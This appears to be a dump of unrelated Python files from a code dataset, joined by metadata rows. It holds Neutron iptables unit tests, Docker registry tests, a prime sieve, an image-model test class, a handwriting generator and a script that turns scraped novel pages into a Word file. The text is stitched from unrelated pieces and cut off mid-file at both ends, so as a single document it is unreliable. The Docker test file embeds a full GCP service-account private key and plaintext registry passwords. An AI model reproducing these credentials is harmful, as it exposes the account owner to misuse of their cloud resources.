'nonexistent', '-j DROP')
def test_remove_nonexistent_chain(self):
with mock.patch.object(iptables_manager, "LOG") as log:
self.iptables.ipv4['filter'].remove_chain('nonexistent')
log.debug.assert_called_once_with(
'Attempted to remove chain %s which does not exist',
'nonexistent')
def test_remove_nonexistent_rule(self):
with mock.patch.object(iptables_manager, "LOG") as log:
self.iptables.ipv4['filter'].remove_rule('nonexistent', '-j DROP')
log.warn.assert_called_once_with(
'Tried to remove rule that was not there: '
'%(chain)r %(rule)r %(wrap)r %(top)r',
{'wrap': True, 'top': False, 'rule': '-j DROP',
'chain': 'nonexistent'})
def test_iptables_failure_with_no_failing_line_number(self):
with mock.patch.object(iptables_manager, "LOG") as log:
# generate Runtime errors on iptables-restore calls
def iptables_restore_failer(*args, **kwargs):
if 'iptables-restore' in args[0]:
self.input_lines = kwargs['process_input'].split('\n')
# don't provide a specific failure message so all lines
# are logged
raise RuntimeError()
return FILTER_DUMP
self.execute.side_effect = iptables_restore_failer
# _apply_synchronized calls iptables-restore so it should raise
# a RuntimeError
self.assertRaises(RuntimeError,
self.iptables._apply_synchronized)
# The RuntimeError should have triggered a log of the input to the
# process that it failed to execute. Verify by comparing the log
# call to the 'process_input' arg given to the failed iptables-restore
# call.
# Failure without a specific line number in the error should cause
# all lines to be logged with numbers.
logged = ['%7d. %s' % (n, l)
for n, l in enumerate(self.input_lines, 1)]
log.error.assert_called_once_with(_(
'IPTablesManager.apply failed to apply the '
'following set of iptables rules:\n%s'),
'\n'.join(logged)
)
def test_iptables_failure_on_specific_line(self):
with mock.patch.object(iptables_manager, "LOG") as log:
# generate Runtime errors on iptables-restore calls
def iptables_restore_failer(*args, **kwargs):
if 'iptables-restore' in args[0]:
self.input_lines = kwargs['process_input'].split('\n')
# pretend line 11 failed
msg = ("Exit code: 1\nStdout: ''\n"
"Stderr: 'iptables-restore: line 11 failed\n'")
raise RuntimeError(msg)
return FILTER_DUMP
self.execute.side_effect = iptables_restore_failer
# _apply_synchronized calls iptables-restore so it should raise
# a RuntimeError
self.assertRaises(RuntimeError,
self.iptables._apply_synchronized)
# The RuntimeError should have triggered a log of the input to the
# process that it failed to execute. Verify by comparing the log
# call to the 'process_input' arg given to the failed iptables-restore
# call.
# Line 11 of the input was marked as failing so lines (11 - context)
# to (11 + context) should be logged
ctx = iptables_manager.IPTABLES_ERROR_LINES_OF_CONTEXT
log_start = max(0, 11 - ctx)
log_end = 11 + ctx
logged = ['%7d. %s' % (n, l)
for n, l in enumerate(self.input_lines[log_start:log_end],
log_start + 1)]
log.error.assert_called_once_with(_(
'IPTablesManager.apply failed to apply the '
'following set of iptables rules:\n%s'),
'\n'.join(logged)
)
def test_get_traffic_counters_chain_notexists(self):
with mock.patch.object(iptables_manager, "LOG") as log:
acc = self.iptables.get_traffic_counters('chain1')
self.assertIsNone(acc)
self.assertEqual(0, self.execute.call_count)
log.warn.assert_called_once_with(
'Attempted to get traffic counters of chain %s which '
'does not exist', 'chain1')
def _test_get_traffic_counters_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
exp_packets = 800
exp_bytes = 131802
expected_calls_and_values = [
(mock.call(['iptables', '-t', 'filter', '-L', 'OUTPUT',
'-n', '-v', '-x'],
run_as_root=True),
TRAFFIC_COUNTERS_DUMP),
(mock.call(['iptables', '-t', 'raw', '-L', 'OUTPUT', '-n',
'-v', '-x'],
run_as_root=True),
''),
(mock.call(['iptables', '-t', 'mangle', '-L', 'OUTPUT', '-n',
'-v', '-x'],
run_as_root=True),
''),
(mock.call(['iptables', '-t', 'nat', '-L', 'OUTPUT', '-n',
'-v', '-x'],
run_as_root=True),
''),
]
if use_ipv6:
expected_calls_and_values.append(
(mock.call(['ip6tables', '-t', 'filter', '-L', 'OUTPUT',
'-n', '-v', '-x'],
run_as_root=True),
TRAFFIC_COUNTERS_DUMP))
exp_packets *= 2
exp_bytes *= 2
tools.setup_mock_calls(self.execute, expected_calls_and_values)
acc = self.iptables.get_traffic_counters('OUTPUT')
self.assertEqual(acc['pkts'], exp_packets)
self.assertEqual(acc['bytes'], exp_bytes)
tools.verify_mock_calls(self.execute, expected_calls_and_values,
any_order=True)
def test_get_traffic_counters(self):
self._test_get_traffic_counters_helper(False)
def test_get_traffic_counters_with_ipv6(self):
self._test_get_traffic_counters_helper(True)
def _test_get_traffic_counters_with_zero_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
exp_packets = 800
exp_bytes = 131802
expected_calls_and_values = [
(mock.call(['iptables', '-t', 'filter', '-L', 'OUTPUT',
'-n', '-v', '-x', '-Z'],
run_as_root=True),
TRAFFIC_COUNTERS_DUMP),
(mock.call(['iptables', '-t', 'raw', '-L', 'OUTPUT', '-n',
'-v', '-x', '-Z'],
run_as_root=True),
''),
(mock.call(['iptables', '-t', 'mangle', '-L', 'OUTPUT', '-n',
'-v', '-x', '-Z'],
run_as_root=True),
''),
(mock.call(['iptables', '-t', 'nat', '-L', 'OUTPUT', '-n',
'-v', '-x', '-Z'],
run_as_root=True),
'')
]
if use_ipv6:
expected_calls_and_values.append(
(mock.call(['ip6tables', '-t', 'filter', '-L', 'OUTPUT',
'-n', '-v', '-x', '-Z'],
run_as_root=True),
TRAFFIC_COUNTERS_DUMP))
exp_packets *= 2
exp_bytes *= 2
tools.setup_mock_calls(self.execute, expected_calls_and_values)
acc = self.iptables.get_traffic_counters('OUTPUT', zero=True)
self.assertEqual(acc['pkts'], exp_packets)
self.assertEqual(acc['bytes'], exp_bytes)
tools.verify_mock_calls(self.execute, expected_calls_and_values,
any_order=True)
def test_get_traffic_counters_with_zero(self):
self._test_get_traffic_counters_with_zero_helper(False)
def test_get_traffic_counters_with_zero_with_ipv6(self):
self._test_get_traffic_counters_with_zero_helper(True)
def _test_find_last_entry(self, find_str):
filter_list = [':neutron-filter-top - [0:0]',
':%(bn)s-FORWARD - [0:0]',
':%(bn)s-INPUT - [0:0]',
':%(bn)s-local - [0:0]',
':%(wrap)s - [0:0]',
':%(bn)s-OUTPUT - [0:0]',
'[0:0] -A FORWARD -j neutron-filter-top',
'[0:0] -A OUTPUT -j neutron-filter-top'
% IPTABLES_ARG]
return self.iptables._find_last_entry(filter_list, find_str)
def test_find_last_entry_old_dup(self):
find_str = 'neutron-filter-top'
match_str = '[0:0] -A OUTPUT -j neutron-filter-top'
ret_str = self._test_find_last_entry(find_str)
self.assertEqual(ret_str, match_str)
def test_find_last_entry_none(self):
find_str = 'neutron-filter-NOTFOUND'
ret_str = self._test_find_last_entry(find_str)
self.assertIsNone(ret_str)
class IptablesManagerStateLessTestCase(base.BaseTestCase):
def setUp(self):
super(IptablesManagerStateLessTestCase, self).setUp()
cfg.CONF.set_override('comment_iptables_rules', False, 'AGENT')
self.iptables = (iptables_manager.IptablesManager(state_less=True))
def test_nat_not_found(self):
self.assertNotIn('nat', self.iptables.ipv4)
def test_mangle_not_found(self):
self.assertNotIn('mangle', self.iptables.ipv4)
| 41.182796
| 79
| 0.52281
|
4a145ab964d7061e38fb46e33e5f09c779e5182d
| 327
|
py
|
Python
|
src/mobu/constants.py
|
lsst-sqre/sciencemonkey
|
02638bb883093c4c225251d32d0b01fe79778c2a
|
[
"MIT"
] | null | null | null |
src/mobu/constants.py
|
lsst-sqre/sciencemonkey
|
02638bb883093c4c225251d32d0b01fe79778c2a
|
[
"MIT"
] | 26
|
2021-02-18T03:44:39.000Z
|
2022-03-21T19:34:52.000Z
|
src/mobu/constants.py
|
lsst-sqre/sciencemonkey
|
02638bb883093c4c225251d32d0b01fe79778c2a
|
[
"MIT"
] | null | null | null |
"""Global constants for mobu."""
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
"""Date format to use for dates in Slack alerts."""
NOTEBOOK_REPO_URL = "https://github.com/lsst-sqre/notebook-demo.git"
"""Default notebook repository for NotebookRunner."""
NOTEBOOK_REPO_BRANCH = "prod"
"""Default repository branch for NotebookRunner."""
| 29.727273
| 68
| 0.718654
|
4a145cb78d609b9a2798c7b4e754c3bf9940c26a
| 8,380
|
py
|
Python
|
forge/tests/test_docker.py
|
aj0415/cforge
|
a99c6333ffa6b7686c8eb622cbf45a742b002716
|
[
"Apache-2.0"
] | null | null | null |
forge/tests/test_docker.py
|
aj0415/cforge
|
a99c6333ffa6b7686c8eb622cbf45a742b002716
|
[
"Apache-2.0"
] | null | null | null |
forge/tests/test_docker.py
|
aj0415/cforge
|
a99c6333ffa6b7686c8eb622cbf45a742b002716
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, time
from forge.tasks import sh, TaskError
from forge.docker import Docker, ECRDocker
from .common import mktree
registry = "registry.hub.docker.com"
namespace = "forgeorg"
user = "forgetest"
password = "forgetest"
def test_remote_exists_false():
    dr = Docker(registry, namespace, user, password)
    assert not dr.remote_exists("nosuchrepo", "nosuchversion")
def test_remote_exists_true():
    dr = Docker("registry.hub.docker.com", "datawire", user, password)
    assert dr.remote_exists("forge-setup-test", "1")
def test_remote_exists_auth_failed():
dr = Docker(registry, "forgetest", "nosuchuser", "badpassword")
try:
dr.remote_exists("nonexistent", "nosuchversion")
    except TaskError as e:
assert ("problem authenticating" in str(e)) or ("unauthorized" in str(e))
def test_validate():
dr = Docker(registry, namespace, user, password)
dr.validate()
def test_gcr():
dr = Docker("gcr.io", "forgetest-project", "_json_key", """
{
"type": "service_account",
"project_id": "forgetest-project",
"private_key_id": "c49f1dd1c0c55418796c510af2cc7f46c4327058",
"private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDymqNXy8GUKSDx\n8/QBPTziiOyZExO1LNa31I5mc+ut4/KPEHzVtCHETpE610utxleUoyt64b9SgYEv\nySEjBJz1Nt36NNM8Pb2/+ju0L6Ha+Cui5iqfKmkHxSbCFIk25s7bh6zWWoQLw3hH\nkK7dSAJ4yeX8/xaExuYOJx9q4mkn7uNuBkIhx/YE17p2NRmuDQR8YxUadz9QgcEL\ntDXb5zBudh1MsLgBK98gZTedDNtlJMHE2zLhIJTPJ7VNwcaPP34OD5W06wcllAjZ\nxmA3eKnl/M8jdLtfrYBituNtQi2UMsNKbAffYWq1XLAvaBMLs+l9Bz4NWCxJJtTB\n0UpGt/BzAgMBAAECggEARNJgdxYKzrySJ4E0nathG8SLFeunAhT7vn+Se/bzi0to\ncnRTbY5hq9477czIn73t93EIcx4aV838N3GfsF7tJdUQSJv2tpavPwg+KqH+kO8o\n9dfEjI2L6RPhKFqKCGSWlwlYmyBnaCzl8KtXJ9f3N4vS7h/xI+6GscogbAJZoWVi\nfODsXZQqO854NwbtsjZj0xBE9ZCEc2MpcXOPn3zYcj5oRP5bNYHd8zsQ6iWGmNnp\n1IloaAFmQDIwijqraGaYHFEATB/2QwXwTjvdr0NVo7tmMkUwJ/wMxxTLgALeddu4\nfuwh1ithkzS8KRK77S/D4PSfpvtUSEu5gkZmslbZ3QKBgQD96FAysHywri/QvElg\nuqhzOmBs2pNmkt9tS5wKSc+oVZ0FlL0qMPomZOZqn2g7Os3p60LMbsriEqn/rvQO\nd3oYjWht2drdqIRPy1R7nVv7/34AYr0SIKJ/W/l3o0FllLN7hJLiJvgxCERyj1Id\na6PWbXYEW8hkbfZi+X5flMSWrwKBgQD0mnom2By5j/SzGg1doMCqb7tCxptF5tFc\nKYBtPORihm34iA77AJK5HBb7Wb4k/WwWXYGOliqRXvQ+MlDcM/iyCvfoHuqz/BWe\nYc+21GKhgbbRJz3XX1uS8UBSaEDmgHLAfXkGLvqtst+ra8MicJ+Ycfc8qNa5wRhy\nTkbwAAKzfQKBgQD0AECxtbDeCUaiDY9miXo/4aWwdgyY0iQsYDDAIlaQqlWPe3Se\nCxsZsnVLmY0M/mHLne4/j2khAFamA3c+P8rxtVLZ3jXaNYuRMxEpCfvPm6N2s2yG\n8x21zqlaM2UxPUmONcUB1/lDBXLhtKFw7HQyKFb1sU5OVO4mByVOrSSOuQKBgQDq\nWNoxPxp+OkrCEXK+wlX0tOmfd3KqTRNGjkiJ4C4bqxnPZGOd3ZW1HhFyrS98dwRI\nhTusJXkRH/03XbOU1YIu6k1LqdtJp3n67VE5pE/+1q0Vw9f+8VBl/xeWHGYZsPTA\nMTZzUy0+n8KllLA23do6Du5Fwqk+/J50XUSfihMMbQKBgH5lRaF14hj1oGckYt3P\nM45hTlW+/wUC1kJGd1gxtdpIMm3RHVGdGl9BGOwJVvAAIigbO8w01279xImcXcCb\nD+XBlvw1pDT3QfFs1t7T+x8blVqoflxsfnQW6eQB5W9arZ9CZBpSzzECppOdus46\n6J1fVJxDL9Nq5ykxjYhDYXY1\n-----END PRIVATE KEY-----\n",
"client_email": "forge-test@forgetest-project.iam.gserviceaccount.com",
"client_id": "106271144892298981142",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://accounts.google.com/o/oauth2/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/forge-test%40forgetest-project.iam.gserviceaccount.com"
}
""")
dr.validate()
START_TIME = time.time()
def test_ecr():
dr = ECRDocker(account='914373874199', region='us-east-1',
aws_access_key_id=os.environ['FORGE_ECR_KEY_ID'],
aws_secret_access_key=os.environ['FORGE_ECR_SECRET_KEY'])
dr.validate()
name = "forge_test_{}".format(START_TIME)
assert not dr.remote_exists(name, "dummy")
dr.validate(name=name)
describe_repos = dr.ecr.get_paginator('describe_repositories')
for response in describe_repos.paginate():
for repo in response['repositories']:
repositoryName=repo['repositoryName']
if repositoryName.startswith('forge_test_'):
dr.ecr.delete_repository(repositoryName=repositoryName, force=True)
DOCKER_SOURCE_TREE = """
@@Dockerfile
FROM alpine:3.5
COPY timestamp.txt .
ENTRYPOINT ["echo"]
CMD ["timstamp.txt"]
@@
@@timestamp.txt
START_TIME
@@
"""
def test_build_push():
dr = Docker(registry, namespace, user, password)
directory = mktree(DOCKER_SOURCE_TREE, START_TIME=time.ctime(START_TIME))
name = "dockertest"
version = "t%s" % START_TIME
dr.build(directory, os.path.join(directory, "Dockerfile"), name, version, {})
dr.push(name, version)
assert dr.remote_exists(name, version)
DOCKER_SOURCE_TREE_BAD = """
@@Dockerfile
XXXFROM alpine:3.5
COPY timestamp.txt .
ENTRYPOINT ["echo"]
CMD ["timstamp.txt"]
@@
@@timestamp.txt
START_TIME
@@
"""
def test_build_error():
dr = Docker(registry, namespace, user, password)
directory = mktree(DOCKER_SOURCE_TREE_BAD, START_TIME=time.ctime(START_TIME))
name = "dockertestbad"
version = "t%s" % START_TIME
try:
dr.build(directory, os.path.join(directory, "Dockerfile"), name, version, {})
    except TaskError as e:
msg = str(e)
assert "command 'docker build" in msg
assert "nknown instruction: XXXFROM" in msg
BUILDER_SOURCE_TREE = """
@@Dockerfile
FROM alpine:3.5
COPY timestamp.txt .
RUN echo original_content > content.txt
ENTRYPOINT ["cat"]
CMD ["content.txt"]
@@
@@timestamp.txt
START_TIME
@@
"""
def test_builder():
dr = Docker(registry, namespace, user, password)
directory = mktree(BUILDER_SOURCE_TREE, START_TIME=str(START_TIME))
name = "buildertest_%s" % START_TIME
version = "t%s" % START_TIME
builder = dr.builder(directory, os.path.join(directory, "Dockerfile"), name, version, {})
try:
# create a builder container based on the Dockerfile
result = builder.run("cat", "timestamp.txt")
assert result.output == str(START_TIME)
# create an image from the builder with no incremental mods
builder.commit(name, version)
# check the image has the correct timestamp and
result = dr.run(name, version, "cat", "timestamp.txt")
assert result.output == str(START_TIME)
# check that the original CMD and ENTRYPOINT are preserved
result = sh("docker", "run", "--rm", "-it", dr.image(name, version))
assert result.output.strip() == "original_content"
# update the timestamp in the builder image
builder.run("/bin/sh", "-c", "echo updated > timestamp.txt")
result = builder.run("cat", "timestamp.txt")
assert result.output.strip() == "updated"
# create a new image from the updated builder
builder.commit(name, version + "_updated")
result = dr.run(name, version + "_updated", "cat", "timestamp.txt")
assert result.output.strip() == "updated"
# check that the original CMD and ENTRYPOINT are preserved in
# the image created from the updated container
result = sh("docker", "run", "--rm", "-it", dr.image(name, version + "_updated"))
assert result.output.strip() == "original_content"
# now let's update the Dockerfile and make sure we launch a new builder
with open(os.path.join(directory, "Dockerfile"), "write") as fd:
fd.write("""FROM alpine:3.5
COPY timestamp.txt .
RUN echo updated_content > content.txt
ENTRYPOINT ["cat"]
CMD ["content.txt"]
""")
builder = dr.builder(directory, os.path.join(directory, "Dockerfile"), name, version, {})
builder.commit(name, version)
# check that the updated CMD and ENTRYPOINT are present
result = sh("docker", "run", "--rm", "-it", dr.image(name, version))
assert result.output.strip() == "updated_content"
finally:
builder.kill()
| 44.105263
| 1,752
| 0.73568
|
4a145df35a900590795fc1f731f7768259f4ef04
| 680
|
py
|
Python
|
Submissions/Tugdual_Sarazin/prime_number.py
|
Kkim-5962/Programming_with_python_2021
|
fe0d32f41ce5b3c13f08337f4e7c0da857195434
|
[
"Apache-2.0"
] | 7
|
2020-09-15T15:52:53.000Z
|
2021-05-19T17:51:56.000Z
|
Submissions/Tugdual_Sarazin/prime_number.py
|
Kkim-5962/Programming_with_python_2021
|
fe0d32f41ce5b3c13f08337f4e7c0da857195434
|
[
"Apache-2.0"
] | null | null | null |
Submissions/Tugdual_Sarazin/prime_number.py
|
Kkim-5962/Programming_with_python_2021
|
fe0d32f41ce5b3c13f08337f4e7c0da857195434
|
[
"Apache-2.0"
] | 49
|
2020-09-12T12:56:32.000Z
|
2021-12-30T13:27:38.000Z
|
def prime_numbers(max):
start = 2
end = max + 1
n = [True for i in range(start, end)]
for a in range(start, end):
if n[a - start]:
for b in range(a + 1, end):
# print(a, b, n[b - start], b % a)
if b % a == 0:
n[b - start] = False
nn = []
for i in range(start, end):
if n[i - start]:
nn.append(i)
return nn
assert prime_numbers(10) == [2, 3, 5, 7]
assert prime_numbers(100) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83,
89, 97]
print(prime_numbers(100))
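# For comparison, a minimal Sieve of Eratosthenes sketch (illustrative): it
# returns the same list as prime_numbers(), but crosses off multiples of each
# prime up to sqrt(max) instead of divisibility-testing every pair, giving
# O(n log log n) work instead of the quadratic scan above.
def prime_numbers_sieve(max):
    is_prime = [True] * (max + 1)
    is_prime[0] = is_prime[1] = False
    for a in range(2, int(max ** 0.5) + 1):
        if is_prime[a]:
            for b in range(a * a, max + 1, a):
                is_prime[b] = False
    return [i for i, flag in enumerate(is_prime) if flag]

assert prime_numbers_sieve(100) == prime_numbers(100)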
| 26.153846
| 118
| 0.432353
|
4a145dfe81f460cc131bf486bcc7f0471958c2d3
| 1,835
|
py
|
Python
|
models/test_model.py
|
MHC-F2V-Research/Image-Reconstruction-Ref2
|
0a124365fc14708bca092f68205987885c91212a
|
[
"BSD-3-Clause"
] | 197
|
2019-10-24T19:51:17.000Z
|
2022-01-29T09:23:49.000Z
|
models/test_model.py
|
MHC-F2V-Research/Image-Reconstruction-Ref2
|
0a124365fc14708bca092f68205987885c91212a
|
[
"BSD-3-Clause"
] | 10
|
2019-10-26T23:56:47.000Z
|
2021-09-03T13:06:53.000Z
|
models/test_model.py
|
MHC-F2V-Research/Image-Reconstruction-Ref2
|
0a124365fc14708bca092f68205987885c91212a
|
[
"BSD-3-Clause"
] | 24
|
2019-10-25T06:36:30.000Z
|
2022-02-10T15:07:46.000Z
|
from .base_model import BaseModel
from . import networks
from .guided_pix2pix_model import GuidedPix2PixModel
class TestModel(BaseModel):
def name(self):
return 'TestModel'
@staticmethod
def modify_commandline_options(parser, is_train=True):
assert not is_train, 'TestModel cannot be used in train mode'
parser = GuidedPix2PixModel.modify_commandline_options(parser, is_train=False)
parser.set_defaults(dataset_mode='single')
parser.add_argument('--model_suffix', type=str, default='',
help='In checkpoints_dir, [epoch]_net_G[model_suffix].pth will'
' be loaded as the generator of TestModel')
return parser
def initialize(self, opt):
assert(not opt.isTrain)
BaseModel.initialize(self, opt)
self.opt = opt
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
self.model_names = ['G' + opt.model_suffix]
self.netG = networks.define_G(input_nc=opt.input_nc, guide_nc=opt.guide_nc, output_nc=opt.output_nc, ngf=opt.ngf, netG=opt.netG, n_layers=opt.n_layers,
norm=opt.norm, init_type=opt.init_type, init_gain=opt.init_gain, gpu_ids=self.gpu_ids)
# assigns the model to self.netG_[suffix] so that it can be loaded
# please see BaseModel.load_networks
setattr(self, 'netG' + opt.model_suffix, self.netG)
def set_input(self, input):
# we need to use single_dataset mode
self.real_A = input['A'].to(self.device)
self.guide = input['guide'].to(self.device)
def forward(self):
self.fake_B = self.netG(self.real_A, self.guide)
def get_output(self):
return self.fake_B
| 37.44898
| 159
| 0.66158
|
4a145edd915b7a499af61168c6f903f6bccd5a98
| 6,830
|
py
|
Python
|
trdg/handwritten_text_generator.py
|
nicolasmetallo/TextRecognitionDataGenerator
|
deb260f96d4421039273582d709e24b6bbf8da16
|
[
"MIT"
] | null | null | null |
trdg/handwritten_text_generator.py
|
nicolasmetallo/TextRecognitionDataGenerator
|
deb260f96d4421039273582d709e24b6bbf8da16
|
[
"MIT"
] | null | null | null |
trdg/handwritten_text_generator.py
|
nicolasmetallo/TextRecognitionDataGenerator
|
deb260f96d4421039273582d709e24b6bbf8da16
|
[
"MIT"
] | null | null | null |
import os
import pickle
import numpy as np
import random as rnd
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.mlab as mlab
import seaborn
from PIL import Image, ImageColor
from collections import namedtuple
def download_model_weights():
from pathlib import Path
import urllib.request
cwd = os.path.dirname(os.path.abspath(__file__))
for k in ['model-29.data-00000-of-00001','model-29.index','model-29.meta','translation.pkl']:
download_dir = Path(cwd)/'handwritten_model/'
download_dir.mkdir(exist_ok=True,parents=True)
if (download_dir/f'{k}').exists(): continue
print(f'file {k} not found, downloading from git repo..')
urllib.request.urlretrieve(
f'https://raw.github.com/Belval/TextRecognitionDataGenerator/master/trdg/handwritten_model/{k}',
download_dir/f'{k}')
print(f'file {k} saved to disk')
return cwd
def _sample(e, mu1, mu2, std1, std2, rho):
    # Draw a pen offset from a bivariate Gaussian with correlation rho, plus
    # a Bernoulli end-of-stroke flag with probability e.
    cov = np.array([[std1 * std1, std1 * std2 * rho], [std1 * std2 * rho, std2 * std2]])
mean = np.array([mu1, mu2])
x, y = np.random.multivariate_normal(mean, cov)
end = np.random.binomial(1, e)
return np.array([x, y, end])
def _split_strokes(points):
points = np.array(points)
strokes = []
b = 0
for e in range(len(points)):
if points[e, 2] == 1.0:
strokes += [points[b : e + 1, :2].copy()]
b = e + 1
return strokes
def _cumsum(points):
sums = np.cumsum(points[:, :2], axis=0)
return np.concatenate([sums, points[:, 2:]], axis=1)
def _sample_text(sess, args_text, translation):
# Original creator said it helps (https://github.com/Grzego/handwriting-generation/issues/3)
args_text += " "
fields = [
"coordinates",
"sequence",
"bias",
"e",
"pi",
"mu1",
"mu2",
"std1",
"std2",
"rho",
"window",
"kappa",
"phi",
"finish",
"zero_states",
]
vs = namedtuple("Params", fields)(*[tf.compat.v1.get_collection(name)[0] for name in fields])
text = np.array([translation.get(c, 0) for c in args_text])
sequence = np.eye(len(translation), dtype=np.float32)[text]
sequence = np.expand_dims(
np.concatenate([sequence, np.zeros((1, len(translation)))]), axis=0
)
coord = np.array([0.0, 0.0, 1.0])
coords = [coord]
phi_data, window_data, kappa_data, stroke_data = [], [], [], []
sess.run(vs.zero_states)
for s in range(1, 60 * len(args_text) + 1):
e, pi, mu1, mu2, std1, std2, rho, finish, phi, window, kappa = sess.run(
[
vs.e,
vs.pi,
vs.mu1,
vs.mu2,
vs.std1,
vs.std2,
vs.rho,
vs.finish,
vs.phi,
vs.window,
vs.kappa,
],
feed_dict={
vs.coordinates: coord[None, None, ...],
vs.sequence: sequence,
vs.bias: 1.0,
},
)
phi_data += [phi[0, :]]
window_data += [window[0, :]]
kappa_data += [kappa[0, :]]
# ---
g = np.random.choice(np.arange(pi.shape[1]), p=pi[0])
coord = _sample(
e[0, 0], mu1[0, g], mu2[0, g], std1[0, g], std2[0, g], rho[0, g]
)
coords += [coord]
stroke_data += [
[mu1[0, g], mu2[0, g], std1[0, g], std2[0, g], rho[0, g], coord[2]]
]
if finish[0, 0] > 0.8:
break
coords = np.array(coords)
coords[-1, 2] = 1.0
return phi_data, window_data, kappa_data, stroke_data, coords
def _crop_white_borders(image):
image_data = np.asarray(image)
grey_image_data = np.asarray(image.convert("L"))
non_empty_columns = np.where(grey_image_data.min(axis=0) < 255)[0]
non_empty_rows = np.where(grey_image_data.min(axis=1) < 255)[0]
cropBox = (
min(non_empty_rows),
max(non_empty_rows),
min(non_empty_columns),
max(non_empty_columns),
)
image_data_new = image_data[
cropBox[0] : cropBox[1] + 1, cropBox[2] : cropBox[3] + 1, :
]
return Image.fromarray(image_data_new)
def _join_images(images):
    widths, heights = zip(*(i.size for i in images))
    # Overlap adjacent word images by 35 px so the joined line reads as
    # continuous handwriting rather than widely spaced words.
    total_width = sum(widths) - 35 * len(images)
    max_height = max(heights)
compound_image = Image.new("RGBA", (total_width, max_height))
x_offset = 0
for im in images:
compound_image.paste(im, (x_offset, 0))
x_offset += im.size[0] - 35
return compound_image
def generate(text, text_color):
cd = download_model_weights()
with open(os.path.join(cd, os.path.join("handwritten_model", "translation.pkl")), "rb") as file:
translation = pickle.load(file)
config = tf.compat.v1.ConfigProto(device_count={"GPU": 0})
tf.compat.v1.reset_default_graph()
with tf.compat.v1.Session(config=config) as sess:
saver = tf.compat.v1.train.import_meta_graph(os.path.join(cd,"handwritten_model/model-29.meta"))
saver.restore(sess,os.path.join(cd,os.path.join("handwritten_model/model-29")))
images = []
colors = [ImageColor.getrgb(c) for c in text_color.split(",")]
c1, c2 = colors[0], colors[-1]
color = "#{:02x}{:02x}{:02x}".format(
rnd.randint(min(c1[0], c2[0]), max(c1[0], c2[0])),
rnd.randint(min(c1[1], c2[1]), max(c1[1], c2[1])),
rnd.randint(min(c1[2], c2[2]), max(c1[2], c2[2])),
)
for word in text.split(" "):
_, window_data, kappa_data, stroke_data, coords = _sample_text(
sess, word, translation
)
strokes = np.array(stroke_data)
strokes[:, :2] = np.cumsum(strokes[:, :2], axis=0)
_, maxx = np.min(strokes[:, 0]), np.max(strokes[:, 0])
miny, maxy = np.min(strokes[:, 1]), np.max(strokes[:, 1])
fig, ax = plt.subplots(1, 1)
fig.patch.set_visible(False)
ax.axis("off")
for stroke in _split_strokes(_cumsum(np.array(coords))):
plt.plot(stroke[:, 0], -stroke[:, 1], color=color)
fig.patch.set_alpha(0)
fig.patch.set_facecolor("none")
canvas = plt.get_current_fig_manager().canvas
canvas.draw()
s, (width, height) = canvas.print_to_buffer()
image = Image.frombytes(
"RGBA", (width, height), s
)
mask = Image.new("RGB", (width, height), (0, 0, 0))
images.append(_crop_white_borders(image))
plt.close()
return _join_images(images), mask
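# Illustrative call (assumes the pretrained weights download succeeds and a
# non-interactive matplotlib backend):
#   image, mask = generate("hello world", "#000000,#282828")
#   image.save("hello.png")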
| 31.330275
| 109
| 0.55549
|
4a146072aeb281d1d5a665fe6c86c6529a74cf81
| 2,777
|
py
|
Python
|
pdfmaker/parser_n77.py
|
bmcmenamin/sundries
|
b41a52da5efab0c67013fb25b080753449571d93
|
[
"MIT"
] | null | null | null |
pdfmaker/parser_n77.py
|
bmcmenamin/sundries
|
b41a52da5efab0c67013fb25b080753449571d93
|
[
"MIT"
] | null | null | null |
pdfmaker/parser_n77.py
|
bmcmenamin/sundries
|
b41a52da5efab0c67013fb25b080753449571d93
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
import json
from bs4 import BeautifulSoup
from docx import Document
from docx.enum.text import WD_ALIGN_PARAGRAPH
import re
from num2words import num2words
scraped_file = "heart_of_obsidian.json"
output_file = "heart_of_obsidian.docx"
chapter_re = re.compile(r"[\s]*Chapter [\d]+", re.IGNORECASE)
def is_chapter_head(para):
if chapter_re.match(para):
return int(para.split()[1])
def to_center(para):
return para == "* * *"
bad_phrases = {}
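# The assignments below override the heart_of_obsidian settings above; the
# script processes one book per run, so only the latest values take effect.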
scraped_file = "reaver.json"
output_file = "reaver.docx"
possible_chapters = {
num2words(c, ordinal=False, lang='en', to='cardinal'): c
for c in range(1, 100)
}
def is_chapter_head(para):
key = para.lower().strip().replace(" ", "-")
return possible_chapters.get(key)
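# e.g. is_chapter_head("Twenty One") -> 21 (num2words(21) == "twenty-one"),
# while is_chapter_head("Prologue") -> None.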
def to_center(para):
return para == "* * *"
bad_phrases = {}
with open(scraped_file, "rt") as file:
html_pages = json.load(file)
max_pages = max(int(k) for k in html_pages)
full_book = []
for page_num in range(1, max_pages + 1):
    parsed_page = BeautifulSoup(html_pages[str(page_num)], "html.parser")
para_text = []
for chap_content in parsed_page.findAll("div", {"class": "chapter-content"}):
lines = [
line.rstrip()
for p in chap_content.find_all('p')
for line in p.get_text().strip().splitlines()
]
para_text += [l for l in lines if l]
for p in para_text:
if any(bp in p for bp in bad_phrases):
print("Dropping para:\n", p)
else:
full_book.append(p)
with open("test.txt", "wt") as file:
